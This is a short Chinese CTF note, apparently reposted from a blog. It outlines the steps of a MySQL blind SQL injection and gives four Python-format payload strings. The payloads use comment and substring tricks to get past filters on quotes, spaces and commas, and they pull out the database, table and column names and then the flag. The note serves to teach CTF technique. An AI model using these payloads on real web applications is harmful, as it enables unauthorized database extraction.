参考:CTF SQL注入
惯用思路(这里的例子是之前做的一道mysql盲注题,题目过滤了很多符号,如:单引号、空格和逗号):
1、首先通过database()函数得到库名,或者去information_schema.schemata表查询schema_name
"0/**/or/**/ascii(substring(database()/**/from/**/%d/**/for/**/1))=%d#" % (i, j)
2、然后去information_schema.tables表利用table_schema查询table_name
"0/**/or/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())/**/from/**/%d/**/for/**/1))=%d#" % (i, j)
3、接着去information_schema.columns表利用table_name查询column_name
"0/**/or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database())/**/from/**/%d/**/for/**/1))=%d#" % (i, j)
4、最后select column_name from table_name 得到flag
"0/**/or/**/ascii(substr((select/**/*/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d#" % (i, j)
原文:https://www.cnblogs.com/MisakaYuii-Z/p/13325162.html